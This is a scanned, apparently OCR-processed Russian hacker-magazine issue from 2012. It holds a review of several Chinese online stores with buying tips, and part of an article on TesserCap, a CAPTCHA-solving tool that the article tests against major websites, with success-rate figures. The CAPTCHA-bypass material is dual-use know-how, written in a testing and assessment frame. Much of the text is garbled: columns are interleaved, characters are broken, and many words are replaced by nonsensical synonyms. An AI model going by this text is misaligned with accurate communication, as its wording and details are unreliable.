Оформить дебетовую другими словами кредитную «Мужскую карту» дозволено во отделениях ОАО «Альфа-Банка», а эдак но заказав в соответствии с телефонам:

(495) 029-2222 во Москве 08-800-333-2-333 на регионах России (звонок бесплатный) или получи сайте

www.mancard.ru

(game}land


PCZONE

римлянин Володин (biohedge!Ogmail.coml

Кита СЕМЬ КИТАЙСКИХ ИНТЕРНЕТ­ МАГАЗИНОВ СО ВСЯКОЙ ВСЯЧИНОЙ Где максимально задаром дозволительно урвать планшетник держи Aпdгoid?

Или осциллограф? Или, для примеру, лазер? А запчасти чтобы разбитого смартфона? Да с годами же, идеже равно десятки тысяч других самых разных

товаров, которые на огромных количества х штампуются во Поднебесной, -в китайских интернет-магазинах. И, сколько важно, соответственно самым доступным ценам .

MADE IN CHINA Три знакомых сотрясение воздуха

относительно нескольких изо них- тех, из которыми имел

<<Made in China >>

давненько

обос н авались нате насчёт гр ом н ом количестве все­

ремесло либо автор этих строк сам, либо мои др узь я. Сразу хочу предупредить, почто коллекция магазина- злоба дня

возможных товаров, во особенности бери технике.

субъективный. Перед кто хочешь покупкой обяза­

Гл у согласно было бы допустим , что-нибудь близко не без; про­

тельно возможно отзывы равным образом имей во виду- по сию пору гда

изводством отнюдь не появятся огромные интернет­

принимать далеко не которая вероятность, который отправление

магазины, идеже всё сие д обро допускается дать взятку

потеряется , в чем дело? залежь окажется бракованным,

по мнению максимально ни зкой ц ене. Д умаю, многие

ась? на коробку положат как бы безвыгодный в таком случае не так — не то соберут

слышали об особенно раскрученном магазине

набор отнюдь не полностью- такое бывает

-

DeaiE xtгeme.com, - ажно кабы е щ е нисколько

везде, сверх исключений. Н в отношении вслед за те цены, которые

во н ем невыгодный заказывали. Н об подобных магазинов

предлагают подобны е ма г ази ны , многие г ота·

д овольно много. Сегодня моя персона хочу растрепать

ваша милость не без; сим мириться. П риступ им?

ХАКЕР

03/158/ 0012

'


В небесная империя вслед за пок у пками ?

FocaiPrice.com Категории товаров: eJ~EJ~

0Ь06p3'n>I0Тef'CipMtO

Способы оплаты:

R ICQQJнн•

R:>ealprice ·~.;о •

;\'\ HOOIIHI(H

Бестсе/VIеры

,., Сnецнаnьные nредnоження

Dropshlpplng

Оrзыsы

PayPar€'

Форуны

&с8АН•-•• СкмАQ

[не чтобы всех товаров]

Q :zo М 02. S

.............

с 04 перед 05 дней

Срок доставки:

В14део

r Q>On!IID!lh

Дmi~'IG~Ait Иrруwкм Хо6бм ЧiКIII

Вотан с лидеров китайской электронной

АатомОбмnW~wе <11(Q!(CyitPW

коммерции предлагает паче 00 000 наимено­

013 CIUI8A-Й КQ,ц-1'1

Ст1:рео Н.'(IUHMK

Чi!:ltOJiдii•I PidiCI:IoopH I!:

Мotorola59B~

~ US$7.49

~ USSl

ваний товаров на примерно 000 категориях [гадже­ ты , аксессуары для ним равно круглым счетом далее] . По край­ н ей мере, что-то около возлюбленный самовластно заявляет. Проверить эти данные сложно, однако то, что-нибудь в этом месте позволяется выкопать

~

самого черта,- сие точно. В ассортименте

./

реверс стонмоаи

магазина имеются копии именитых б рендав

./

t,есплатый ремоlfТ о rечеине 08Dдней

[ох олигодон сии китайцы], телефоны равным образом оргтехника

во теценне

00 дней

Мобильные телефонw

• Те~~еФо-

.u~ Androtd • TUie:ФO- С tl!:tCC\PНWOI • Qwerty тt,!J~eФOttw

радикально приемлемого качества [судя равным образом в области лич­ ному опыту, равным образом по мнению отзывам] .

Комn1>10теры равно конме

Фотоаnnв ратw

"

• Ч~wмll.ei\cw

• 0'\nанwе'"..м:

• МР3

~

• КА&еllммде.Р*о'те/IМ

• ltJwo8м.rypw

• Aa'nмtollмn ... welк(I!C(y

• 0Ca6e/ltt ., npeo6pa:JO•aтe

Аксессуары

Apple

• Сец:-

• Аксео:уl""'~~

Первое, который привлекло меня близ знаком­

nк м нoYJfi

.. ttWWIUII

НР-4 м

MPS

емео

• Нio'(IUHIUtM

• Alc.cy"YII•ro~ ко :IAPI'Att

o6opyAOfla-

~Оnоеещения

~ в,-...-..-·- -

ст ве от магазином, - сие цены. У некоторых

товаров они были ниже, нежели держи еВау [да-да, китайцы продают порядочно своего товара

настоящий раздел может служи ть <<nесочницей>>,

да в западном аукционе, же пишущий сии строки сей минута

идеже не запрещается справить прикольную мелочевку

Впрочем, доставка, вроде равно везде, может затя­

разбирать никак не будем]. Как оказалось поз­

равно надоедать для сервису, никак не тратя значи­

нуться. Обычно передача быть хо дит никак не вначале ,

же, мочь реализовать согласно ценам дальше

мых сумм.

нежели чрез двум недели. Если твоя милость сделаешь за­

Каждый изделие имеет описание, рейтинги

рыночных обусловлена территориальной бли­

во вкусе у приблизительно всех магазинов такого плана.

каз с гаком $20, так <<Фокал>> предупредительно привяжет

зостью магазина для заводам -изгот овителям.

равным образом отзывы, которые помогут изготовить отбор .

ко твоей посылке трек-номер к отслежива­

Более тог о, «Фока л >> на весь народ предлагает

Для оплаты не грех пустить в дело PayPal.

ния статуса работа .

кончить держи форуме магазина передача

С недавних пор FocaiPrice стал достигать

касательно том, что-то твоя милость эврика какой-либо с това-

да

WebMoney, только временно невыгодный про всех товаров .

В целом возможность оставляет приятное впе­ чатление , но, клеймящий соответственно отзывам, да симпатия невыгодный лишен

ровик дешевле,- на таком случае стоимость полноте

Магазин неоднократно проводит неодинаковые акции,

на сех группировка дартны х проблем <<ки тайски х>>

пересмотрена. Посетителям в свою очередь доступен

а чтобы некоторых предложений очищать ски­

магазинов: задержки, недокомплект, несоот­

раздел со спецпредложениями, которые

дочные купоны, коды которых допускается встретить

ветствие характеристикам.

отсортированы до ценам, начиная с одного

во интернете.

доллара. Для сомневаю щихся или — или новичков

Что касается доставки, ведь возлюбленная бесплатная,

КАТЕГОРИИ ТОВАРОВ

ШЕСТЬ СОВЕТОВ ДЛЯ НАЧИНАЮЩИХ 1.

Купоны- сие отличная реальность сохранить одну каплю денежек . Причем почерпнуть адрес купона

ничуть неграмотный сложно: их раздают сверху сайтах может статься гeta il menot . com [крупнейший, только англоя зы чный ресурс] , chinaprices.гu , а как и во темат ических сообществах . В конце концов, позволительно банально вбить во искатель <<куnон получи и распишись скидку <ИМЯ магазина»> .

0. Чтобы борзо отрыть занимающий тебя залежь равным образом соотнести цены, не возбраняется nоnробовать сначала восnользоваться специализирован ными nоисковиками. Например seaгchsku.гu ищет по двадцати разным магазинам. Такой но услуга лакомиться равным образом бери сайте ch i napгices.гu .

0.

Перед покупкой никак не поленись полазать до форумам, nочитать информацию что до томик другими словами ином магазине- сие может чрезвычайно nомочь . Изучай nлощадки. Изучай, изучай да покамест в один из дней изучай.

Dl

Мелкая электроника

r::]

Товарыб;ля

fl

Сувениры

01

Бижутерия

а

Товары в целях

I!J

Товары интересах

автомо

иля

здоровья

детеи

~

u ~

0 D м

Товары для дом а

Игрушки Часы Спортивные товары

Одежда Музыкальные инструменты

Сообществ шоnоголиков без дальних разговоров отбою нет - для примеру, форумы ebay-foгum.гu равно mySku.гu .

0.

Если неожиданно произошла какая-то оплошность [допустим, nри что касается тправке , доставке] сиречь поглощать вопросы по ассортименту- малограмотный стесняйся составлять во поддержк у. В висконсия е некот орых магазинов инда есть русскоговарящие сотруд ники.

0.

При оплате заказа нужно исnользовать исключительно nроверенную платежную систему. В прозопальгия шин стве случаев сие

PayPal . Некоторые китайские магазины поддерживают WebMoney равно даже если Qiwi, но, PayPal- они оче нь метко умеют разгадывать проблемы

тем отнюдь не менее, моя персона рекомендую утилизировать

СПОСОБЫ ОПЛАТЫ

PayPal· weьmoney ~;;.

Pa yPal WebMoney

от нерадивыми продав цами.

0.

Терnение, терnение равным образом до этих пор единовременно терnение. Заказывая от интернет, н ужно существовать готовым

Qiwi

подождать. Заказ могут целую вечность формировать, целую вечность отправлять, а спустя время затруднить для таможне

иначе возьми каком-нибудь этапе работы многострадальной П очты Ро ссии.

ХАКЕР ОЗ

/158/ 0012

Кредитные карточная игра

039


PCZONE

Dealextreme.com Категории товаров: Hom8

$2 Gadgeta

РауРаГ

Срок доставки:

ОТ

01

Тор Sellll"'

Ordar Tracklng

*

Foruma

~ews

SDC..'(I,>INd;I"'IO>e~~Digl:.lloU~m«..,LCOOI;;.!Iy~,I......._C!> а -

• .....• ._"" "EISV 00 Say, fosy ta S1 ~~· • STAAS ol OIC VJdeo Cont~5t "-"с o;ome outl

с---~

Способы оnлаты:

Oeals ~

New Arr1vat s :\\

-

IJ t. a_

-

ДО

_.

00 Д НеЙ

._

Сложнонеупомянутьодинизсамыхизвес~

--·-

ны х китайских магазинов- DeaiE x tгeme . com . Свой центральный эмпирия покупки во китайских

~.,

интернет-магазинах ваш покорный слуга павел учил в частности здесь.

......

-·-·--

Чего автор лишь только безграмотный заказывал: равно защитные

пленки, равным образом батарейки, да фонарики, равно кинематография для телефона, равно всевозможные аксессуары. Рас­

-

Adulr.Toyi(Нot]

сказывать здесь особенно равно нечего: нынешний фонд

ранее опробовали тысячи людей. Основное на­ правление магазина- гаджеты, представлен­

C.rtiolder S~e J НOunl

USB Ooclr.lng Statlon

E271 .SW65001<158·

Chllrgerwolt\US8

LumenЗO·I..!OWMe

for iPI>one4/ 05 - !lll(lr.

Dat.a / ~rgl ngcaЫeror

l..iohl Bulb

( АС

CII~CitiveScree n TouchlngК.ndWormer

Gloves • BI.adc(PII<-)

ные на астрономических количествах равно объединение беда

привлекательным ценам. Е сть двухдолларо­ вая область распространения ради мелочевки, разделы новинок

Отследить отъезд не запрещается сообразно тр ек-номеру,

да не без; пецпредложений . Аналогично TiпyDeal ,

какой-никакой предоставляется безмездно пр равно за­

резерв предлагает выручать равным образом накапливать

казе сверху

бонусные баллы, п убликуя описания сиречь видео

равно отзывы сверху форумах, позволительно резюмировать:

не запрещается быстрее, ведь не чета выехать

ко товарам. Выполнить оплату давалец может

D ealextгeme- приличный магазин, у которого

другим ресурсом, особенно сие касается людей,

при помощи

лишь сам недостат ок: серьезная медлитель­

которые занимаются дропшиппингом [посред­

ность [посылку не грех до второго пришествия вяще месяца!,

ничеством!.

Pa yPa l

или — или не без; п омо щью кредитной карточная игра ,

рядом этом ради доставку десятая спица синь порох невыгодный возьмет.

$15. Учиты вая

приватизированный эмпирия

что-нибудь связано не без; громадным числом заказов .

Итог: сам за себе с самых раскрученных мага­ зинов. Но буде тебе нужно надергать предмет торговли на правах

"

Tinydeal.com ';..[

насчёт

0 Toup (08)

Категории товаров:

t:::::::"'

..._,."_.

Способы оплаты:

IPhoм, 0 ~ м

РауРаГ

....._..

-

-.д_,.

Срок доставки:

ОТ

0 ДО 05

днеЙ

lhd

..

~~:-- . Кр-.

.. , , . . _

Дрн м Dфме

В ассортименте онлайн-магазина пред­ ставлены электроника, уникальные гаджеты и куча самых разных товаров , притом

Иrp'f\IU!IIIIxa66tl . . _ .. дi)uOЦIItlltOCПO

Лидеры продаж )

Cnopflla'I'AWX

~tl:li'lqi-U

~

зa,.,s--c.u..aw

весь круг месяцочек появляется сколько-нибудь тысяч новинок . Для каждой позиции представлены

подробное описание, рейтинги равным образом отзывы, а временем видео равно русскоязычные коммен­

тарии. Порадовал как и онлайн-чат, идеже я смог души заразиться ответы держи интере­ сующие меня вопросы, притом для русском

языке. На сайте кушать раздел спецпредло ­

дарков. Помим по части

жений от еженедельными скидками, а опять же

ются кредитные карточная игра равным образом WеЬМопеу. Впро­

ко товаров, в таком случае в целях получения демон платн ого

пятидолларовая диапазон в целях мелких товаров.

чем, автор этих строк постоянно в одинаковой степени горячо рекомендую

треки н г-номера плата хо тя бы одного изо них

Цены паче нежели приемлемые , точный

выполнять постоянно торговые связи чрез

винтернетеможно отыскать купоны нате скидки

побольше надежно, полегче камня на камне не оставить транзакцию .

должна существовать перед этим $20. В противном случае за треки н г придется довнести $2-3. Перв ой

[5-7 %1. Плюс ко всему прочему очищать воз­

К тому но держи оплату картами не долго думая д ейству­

моей покупкой во этом магазине был телефон,

можность в области купать вещи после баллы [так

ет сокращение на $150.

да всё как рукой сняло в качестве кого возбраняется лучше.

называемые ТО Poiпtsl , которые начисляются

Pa yPal,

для оплате принима­

PayPal-

зто

Доставка на любую точку решетка бесплатна.

безраздельно нюанс: когда на тво ем заказе несколь-

Вывод: в отношении тличны й торговое помещение из широким ас­

вслед за публикацию комментариев да обзоров .

Посылка идет, на правах да везде,две-три недели [бы­

сортиментом, адекватные услуги равно поддерж­

Приятный бонус- около заказе нате сумму

вает, ась? доходит да из-за неделю, однако сие иногда

ка - например, кабы быть получении почему-то

с лишним

редко!. Трек-номер пользу кого отслеживания посылки

никак не хватает, ведь в дальнейшем обращения нормально минуя

выдается подле заказе сверху

проблем высылают недостающее .

$200

тебе предложат подобрать единодержавно

с нескольких возможныхнебольших вдоволь

01,0

$35, однако шелковица принимать

ХАКЕР

03/158/2012


В небесная империя следовать покупками?

Pandawill.com Категории товаров:

МоА uкаукт

mD м

Ht llo , Sign ln Or 0'8g1stor

n

Поисхаn. мсь мага1мн 0Д8СЬ

Способы оплаты :

РауРаГ -

Срок доставкiА:

ото 05 давно 05 дней

AxceccyapAppie

С0Т08Ы1611Теnефон

Пn11W8T

Дolol

Мода

Од8*д8Д8Т8Й

(i

П оиск

~~·...----.....,....,..,.~

ХО1,1ПЫОТ8р

-~

fJflЬi;(ё~

Ht'lp

[] RSS

~~~'

~

НС18НН1М

-

Ruulan 0 USD

&'М

live

0611 коо,..а(О)

-

0р3НАW

-~

BceiCaТ8ropt81'"'

All Free Shipping! -

Еще единовластно непривычный интернет-магазин, ко­

~* ' -

ПРАЗрНИЧНЫЕ КОДЫ КУПОНОВ:

<:" P~NDAWILLB0-5 ,

PANDAWILL150-10, PANDAWILL200-15,

PANDAWILLЗ00 -30,

Подробнюи

'\.

' "~·

PANDAWILL400-50, PANDAWILL500 ;~5 -

торый чуточку ч ем выделяется сре ди конкурен ­

Прямь1е nоставки/Опт Дflillj)a)МOЩotiiUI»-IIInpRIIIYIO

тов. Н о, получи и распишись моего взгляд, ряды максимально

IIOCTHI()IIo\IJolont,~\QfфoptoiOЦiolll,

фотоrрефt~А

roupoe 003 noro Pandow'l.

м:r.с 'Фi'·!J!:W

адаптирован на русскоговарящих покупате­

лей. Судя объединение отзывам, се г одня некто единовластно с лиде­

В се что до

последних

канал объединение числу продаж во страны СНГ. Н а форуме

новинках nодпис•mься сеичвс?

сайта доступен бойкий русскоязычный раздел, а парламентер магазина постоянно

Вынrраrь

встречается от потенциальн ыми п оку пателями

Бесплатные ЛOAiJPKII

Тол•ко

для тематических ру сских форумах- короче говоря, саппорттут отмен ный. Из заметных преимуществ магазина- пиковый ассор ­

Популярные вещи

тимент телефонов (в томище числе равным образом не без; из-за косом

Мода

Новинки

An•

Лю6мтепейl

# Распродажа

Отправьте

Пnаншаты

нам фотографию

подина популярные марки ! . Водан мои знакомый при обрел на Pa ndawill городок уляр н у ю китайскую

ПniMU/e'fP!oo!Й IIONI!bwn.p

вawero малыwа

Alno1Novo7Aurora

н nолучите nодаро~е

Arldtokl4.0 HrfACHIIPS Э кр111 0GB 0GB RАМ

мо д ел ь телефона равным образом остался доволен во вкусе самой

Topon~necьl Коnичес:тео

US$115.99

покупкой, т а для да быстрой д оста во кой, кото раиса

заняла итого червон дн ей. Советую отнюдь не забыть про раздел распродаж- вслед за тем дескать йствительно

дозволительно выкопать беда дешевые т овары . Оnлата через PayPal да ли картами Visa равно Master Сагd,

предоставления бесnлатного трек-номера: его

вдобавок допускается паркет учит ь заметную ски дк у

позволяется почерпнуть лишь nри заказе для сумму

лавка к русскоязычного пользователя,

соответственно купону. До жалование буд е т бесплатной. Един­

вместе с выш е $50 (тут согласно сравнению вместе с конкуре нтам да

и так да далеко не со самыми ни зкими ценами в попу ­

стве нное, что-нибудь ми малограмотный понравилось,- усик л овие

« Панда >> приметно проигрываетl.

лярные товары.

Общее впечатлени е: бесподобный чайный

ТРИ ДОПОЛНИТЕЛЬНЫХ МАГАЗИНА NOWSUPPLIER.COM Категории товаров:

m

Способы оплаты: Срок доставки:

MERIMOBILES.COM

BUYINCOINS.COM

Категории товаров:

m~

PayPar -

Способы оплаты:

PayPal

через

Срок доставки:

с

~Е] fj

0

0 вплоть до 05 дней

Категориитоваров: m~во -

04 вплоть до 05 дней

Способы оплаты:

PayPal· -

Срок доставки:

ото

0 до самого 05

дней

Многие человечество успешно nриобретали на этом

Интернет-магазин с предприимчивы х

Порадовала до чертиков быстрая lи, кстати,

магазине планшеты равно другие гаджеты ,

американцев. Посылки приходят изо Китая ,

бесnлатная) подводка , особенноучитывая

да у меня был жалобный опыт: заказав

и так во поддержке работают одни << штатовцы >>.

nредновогодние дни. По широте ассортимента

равным образом оплатив телефон, ваш покорный слуга получил образец со

Заказывал у ни х в области мелочи- портплед , ЗG-модем

сайт неграмотный уступает конкурентам. Из нареканий

урезанным функцианалом (на $30 дешевле)

равно стилусы . Как у всякого уважающего себя

-только периодические лаги сайта. Если

равным образом невыгодный того цвета . Печален ажно безвыгодный самопроизвольно случай

китайского магазина, платеж вследствие PayPal да бесплатная подкатка nрисутствуют,

бы не. зто, в таком случае лавка занял бы достойное

отnравки далеко не праздник модели, а то, что-то безвыездно попытки как-то хлопнуть проблему неграмотный увенчались

а nосылки отправляют обычной почтой равно помимо

равным образом TinyDeal .

успехом. Возможно , посредством

трекинга .

PayPal

было бы

помещение подле от моими фаворитами FocaiPгice

попроще вскрыть диспут, хотя безграмотный факт.

ЗАКЛЮЧЕНИЕ

позволительно сохранить . Если третьяк минуя отзывов­

обращайся на службу поддержки. Н е забывай :

В заключен да е хочетс моя особа перед ба свивать , зачем об дин равно оный

в обязательном порядке уточняй комплек тацию равным образом харак­

китайские интернет-магазины лишь только ради тех,

но изделие может состоять в многих магазинах,

теристики : почасту присылают бог знает что отличное

который может дожидаться . Е сли что-нибудь -то нужно на этом месте равным образом

да объединение разным ценам. П озтому поначалу сравни

через указанного на описании. Чтобы максимально

сейчас, в таком случае вернее семо даже если безграмотный заглядывать. И

равно лишь впоследствии совершай заказ. Не поленись

подстраховать себя, оплату л у чше пров одить

основа основ правило: тот, который ищет, ввек найдет.

порыскать на Сети куnоны получай скидку, от ними

после PayPal. В случае проблем во что-нибудь бы ведь ни стало

Удачных покупок' ::Х::

ХАКЕР

03/158/2012


PCZONE

Гурсев Синг х Калра 0gursev.kal ra!a foundstone .com 0

ка н ость ТЕСТИРУЕМ УНИВЕРСАЛЬНУЮ РАСПОЗНАВАЛКУ САРТСНА

Ес ть ра з ные способы пользу кого обхода САРТСНА, которыми защищены с а й твоя милость . Во - первых , будучи вместе с твуют с п е ц равно альные сервисы,

РЕШИТЬ САРТСНА

ем. Взлом Сарtс h а-фи л ьтров» изо

#1 05

равно

#126

Р штукарь п озна во а н ие СА Р ТС Н А - проблема чаще на этого

номеров соответс т венно. Сегодня а аз многогрешный хочу

нетривиальна ваш покорнейший слуга . Н а рисунок надо

ра сс показывать тебе что до разработке TesseгCap, ко т об ­

класть массу единовременно л ичных фильтров, что­

рую ав т оранье называет универсальной решалкой

бы прибрать искаже н ия равно п омехи, которыми раз­

СА РТ СНА. Любопы т ная штука, вроде ни кру т и.

работчики желают упрочить несгибаемость вслед за щ равным образом т ы.

ПЕРВЫЙ ВЗГЛЯД НА TESSERCAP

ко оторые да спользуют умеренный

Зач а стую п риходится реализо на ыват ь обучае ­

ручно й сочинение равно бу ко вально ради $1

мую сис т ему бери ос н ове нейронных сетей [зто,

Ч в таком случае вместе с д елал сочинитель п ро г раммы? О н посмотре л ,

предлагают ухлопать

ко слову, далеко не беспричинно не без; л ожно, во вкусе може т показа ть­

по образу естественным путем подхо д ят ко п р облеме автоматизи­

ся], в надежде д обиться п р иемлемого результ а т а

ро во фактически н ого решения СА Р ТСНА да до п робовал

сообразно ав т оматизиро во анному р ешению капч. Ч тоб ы

подвести итог данный квалификация на в рассуждении д ном равным образом н струмен т е .

понять, насчёт нежели моя особа говорю, лу чш е п по части д нят ь очень во

Автор заметил, сколько интересах удаления ш умов не без; из ­

0000

капч.

В для ачестве альтернативы м об ж н относительно попытаться написать и нтелле ко туальную вместе с да стему,

да прочи т ать заме ч ате л ь н ые ста т ьи <<Вз л ом

браже н ия, т насчёт ест ь реше н ия самой слож н ой

САР Т С Н А: суждение равным образом прак т ика. Р азбираемся,

задачи присутствие распознавании капч, чаще постоянно г что до

по образу л омают ка п чи» равным образом << П насчёт д смо т рим равным образом рас п озна-

применяются одни равно те а фильтры. П олучает-

котяра орая в области опред е ленным

алгор равным образом т м а м полноте сама выполнять признание .

САРТСНА

Обработанная САРТСНА

Распознанный текст

Последнее пока что позволительно

HMLR

р е ал изо ова т ь от сообразно м ощью

вместе с пец равно альной утилиты .

01,2

С хема анализа САРТСНА- изображени й не без; через

TesserCap

ХАКЕР

03/158/2012


Проверка в устойчивость

не без; я, что-нибудь неравно продать приспособленный инструмент, позволяющий лишенный чего сложных математических

~ ~-

.....

-

преобразований класть фильтры держи из ­

[: 0152\4'] ~ ~~-- ·::

бражения, равно совокупить его из ОСR-системой

-

- -

... _

весь работоспособную оборона грамму. Это, с обстве нн о, равно нашел Гурсев Сингх Калра

с компании

McAfee. Зачем

--·==

... 0

L41 ~2~

ради распознавания текс т а, т насчёт не запрещается произвести

з т по отношению было нужно?

0

01~2\А

Автор утили т ы решил таким об однова ом про­

\ 'О=

верить, сколько безопасны капчи для рупных ресурсов. Для тестирования были выбраны т е

-·1 -~ 0

~- ,------

""---""""""""'

Wiilli)

в рассуждении

-

.

.

0 ~- 0 4755535

[~ __j ·1 ·~3

G1

tт:U.

-

01~

l ~k l 0 ~70 ЭИН

[

интер нет- сайты, которые являют ся са мыми

005Ul76

~~or.- ::::1

ь:

.... ,..с--

J

Предварительная улучшение изображений да равно з устремление

Кандидатами сверху причастность на т естировании стали

текста с капчи

Wikipedia,

еВ ау, а как и

-~

Ufff:i

--·--·-- -

~

~

...

статистики www . quaпtcast . com/top-sites-1 .

провайдер капч гeCaptcha.

-

01 о 1 0" liJ G 1 0 ~269

посещаемыми до версии известного сервиса

такие монстры, вроде

~~ c:::::!LJ

. _:l/flilf[~

Результат анализа капчи xakep.ru из предварительной обработкой изображений . Судя согласно результатам, фильтр подобрать неграмотный посчастливилось

ИНТЕРФЕЙС. ВКЛАДКА MAIN П осле з ап уска программы п еред нами пред­

нужно по отношению признавать результаты рас объединение з нав а н ия

закон функционирования программы, т что до что касается н

стает окошко со тре мя вкладками:

изображений, об тм етив отдельный изо них вроде

хватает прост. Исходная капча поступает

lmage

на систему предварительной обработки изо­

охватывает азбука управления, которые

няя, сугубо значимая цель служит в целях

бражений, очищающей нарост говорят ото всяких шумов

исnользуются интересах зап у ска да остановки теста

передачи любого изображения на систему nред­

равным образом искажений равно до конвейеру передающей по­

САРТСНА-изображения, формирования ста­

варительной обработки, на которой задается

лученное икона ОСR-системе, которая

ти стики т еста !сколько отга дан о, а сколь

фильтр, удаляющий не без; изображения шумы да ис­

из тарается разобрать телекс получи и распишись нем . TesseгCa p

нетl, навиг а ци равным образом равным образом выбора изображения на

каже ния. Чт обы дать углубление т инку во сис т ему

имеет диалоговый графиче ский интерфейс

предварительной обработки. В закраина чтобы ввода

предварител ьн ой обработки, получи д по части прикокнуть

да обла верно е т следующими свойст на ами :

URL-aдpeca обязан взяться указан верный

получи требуемом изображении nравой кноnкой

Е сли расценивать во об суп х штрих х

0.

0.

0.

Ma in, Options,

P гepгocessing. Основная супинатор

коррек т н ы й либо — либо неучтивый . Н у да послед­

URL-

Имеетуниверсальную систему пре двар равным образом ­

aдpec, кой веб-приложение использует

мыши равным образом во кон т екс т ном подбор найти редюит

тельной обработки изображений, которую

чтобы извлечения капч. URL-aдpec позволительно по­

Send

дозволено сверху сооружать с целью каждой отдельной

л бить следующим образом: кликнув правой

lmage

Рг ергосеssог.

ИНТЕРФЕЙС. ВКЛАДКА OPTIONS

капчи.

для н в отношении nко й мыши

Включает во себя сис тем у распознавания

откопировать другими словами пропускать адрес страницы

Вкладка насчёт пци й со д ержит неодинаковые злементы

Tesseгact, которая извлекаеттекст изо пред­

да извлечь URL-aдpec с атрибута sгс тега из ­

уnравления к конфигурирова ния TesseгCap.

варительно проанализированного равно под­

бражения

Здесь позволяется подобрать ОСR-систему, вслед за д ать

готовленного САР Т С Н А - изоб ра жения.

гu зто надсыл www.xakep.гu/common / гateit/

Поддерживаетиспользованиеразличных

captcha.asp?name=xakep . гu . Ряд ом со стро-

сацию равно предварительную обработку изобра­

ко дир овок во системе распознавания .

для ой а др еса находится элеме нт, задающий

а ни й, присыпать пользовательские НТТР­

ко оличество капч, которые н ужно найти дело

вслед головки , а да показать диапаз об н символов

Думаю, тотальный содержание понятен, поэто м у

чтобы тестирования. Та для равно как добавление может

ради системы расnознавания: цифры, буквы

no

<img>.

САРТСНА-изображению,

То

Н апример, во случае из

xakep.

предлагаю посмотреть, вроде сие выглядит .

в так же время nоказывать всего-навсего

Универсал ьн отросток утилиты н е могла неграмотный приве­

б р ажений, на нем предусмотрены начатки

сти ко усложнению ее интерфейса, п оэтому ок н что касается

у пр авления чтобы постраничного п ролистывания

программы может вв ести во короткий от т у пор .

загружен ны х нарост ч . Та ким образом, быть мас­

02

изо­

мера веб-прокси, вобрать nереадре­

во нижнем регистре, буквы во верхнем регистре , сnециальные символы.

Теперь что касается каждой оnции поподробней . Пр насмешник д е всего, позволено прибрать ОСR-систему.

Так что, под т ем в качестве кого п ереходить н е п ос ред­

штабном тестировании ты да я сможем nроли­

П насчёт умолча нию д оступна всего-навсего одна ­

ствен н что до для ра спознаванию капч, предл агаю

ст ыв ать загруженныекапч ии пр подвергать осмотру

Te sseгact -ORC , этак ась? замора чивать ся

разобраться вместе с ее интерфейсом равным образом заложенным

результаты их распознавания. Кнопки Staгt

со выбором т ут малограмотный придется. Еще одна архи

функциона л ом.

равно

интересная вероятность программы- вы­

Stop запускают

равным образом оста н ав лива надстройка тестиро­

вание соо тветствен но. По из ле те со т ирования

краснолесье диапазона символов . Возьмем, напри­ мер, капчу со xakep . гu- видно, почто симпатия малограмотный со­

д е ржит н равным образом одной букв ы , а состои т т по части льк о из цифр. Так дьявол нам лишние символы, которые всего увеличат объективная возможность невыгодный кор­

ОБАВТОРЕ

р ектного распознавания? Конечно, они нам ни ко чему, потому рядом тестировании капчи

xake p.гu выгодно отличается указать, почто симпатия содержит Мы неграмотный могли малограмотный выговорить х отя бы туман слов об

Подразделение профессиональны х услуг

в отношении бытие цифры: Num eгics. Но почто если бы избрать

авторе замечательной утилиты TesseгCap .

FoundstoneФ, на котором симпатия трудится, nредлагает

Uррег

Его зовут Гурсев Синг х Калра . Он работает

организациям эксnертные обслуживание да обучение,

п ознать капчу, состоящую изо заглавных букв

главным консультантом на подразделении

обесnечивает nостоянную равным образом действенную

любого языка? Н ет, отнюдь не сможе т. Пр ограмма бе­

профессиональных услуг

защиту их активов ото самых серьезных угроз.

рет роспись символов, используемых на рас­

во х одит на число

Команда nодразделения nрофессиональны х

познавания, изо конфигурацио нны х файлов,

услуг состоит с признанных экспертов

находящихся во \Ргоgгаm

во области безоnасности равным образом разработчиков,

Fг ее Too l s\TesseгCa р

Foundstone, которое комnании McAfee . Гурсев

выступал получи и распишись таких конференциях, вроде Тоог­ Соn ,

NuiiCon

да

ClubHack. Является

автором

Case?

Сможет ли пр ограмма рас­

Files\ Foundstone 1.0\tess data\co nfig s\ .

инструментов TesseгCap да SSLSmaгt . Помимо

имеющих роскошный оnыт сотрудничества

П оясню получай прим ере : буде наша сестра выбрали

сие го , разработал порядком инструментов в целях

от международными корnорациями

опции Numeгics равно L oweг

внутренних нужд комnании . Любимые языки

равно государственными организациями

обратится ко файлу loweгпumeгic, начинаю­

сообразно воnросам безоnасности .

щ емуся от параметра tessedit _ chaг_whitelist.

программирования-

ХАКЕР

03/158/ 0012

Ruby, Ruby on Rails

равно С#.

Case,

в таком случае пр ограмма


PCZONE За ним пристало инвентарь символов, которые

ИНТЕРФЕЙС . ВКЛАДКАIМАGЕ

будут употребляться интересах решения капчи.

PREPROCESSING

По умолчанию на файлах содержатся только лишь

Н у гляди наша сестра да добрались поперед самой интересной

буквы латинского алфавита, беспричинно ась? на рас­

вкладки . Именно т ут настраиваются фил ьт ры

познавания кириллицы полагается променять иначе говоря

интересах у д а л е н ия со капч различных шумов равным образом раз­

мытий, которые стараются максимально

приложить оглавление символов.

Теперь крошечку по части том, про что такое? нужно поле

Http Request

Headeгs. Например, для не­

Процесс настройки универсального фильтра предельнопрости состоит изо девяти каста п ов.

того с намерением различить капчу. Чтобы TesseгCap

Изменения изображения отображаются возьми

смогла нахватать дорога ко капче, программе

каждом этапе предварительной обрабо т ки.

надобно вручить во запросе НТТР такие

Кроме того, получи и распишись странице имеется в наличии компо-

заголовки, как бы Ассер!,

нент проверки, кой позволяет просчитать

да Rеfеггег

равным образом т. д . Используя веб-прокси IFiddleг, Вuгр, Chaгles, WebScaгab, Рагоs равно т. д.l, можно перехватить посылаемые заголовки запро­

са да назначить их во фон ввода

наложенном фильтре. Рассмотрим подробно каждый этап.

H eadeгs. Еще одна опция, ко т орая навер ­

Этап

няка пригодится,- сие

На данном этапе инвертируются цвета

Rediгects.

Веб-сайт

Доля распознанных капч

Wikipedia

00-30%

ЕЬау

00-30%

reddit.com

00-30%

CNBC

>50%

foodnetwoгk.com

00-90%

dailymail.co. uk

>30%

megaupload .com

>80%

правильнесть распознавания капчи близ

Http Request

Follow

САЙТАХ

осложнить задачу системе распоз н авания.

которых веб-сайтах нужно залогиниться, про

Cookie

РЕЗУЛЬТАТ ПРОВЕРКИ САРТСНА НА ПОПУЛЯРНЫХ

0.

Инверсия цвета

Дело на том, в чем дело? TesseгCap согласно умолчанию

пикселей пользу кого САРТСНА-изображений. Код,

далеко не необходимо переадресации. Если испытательный

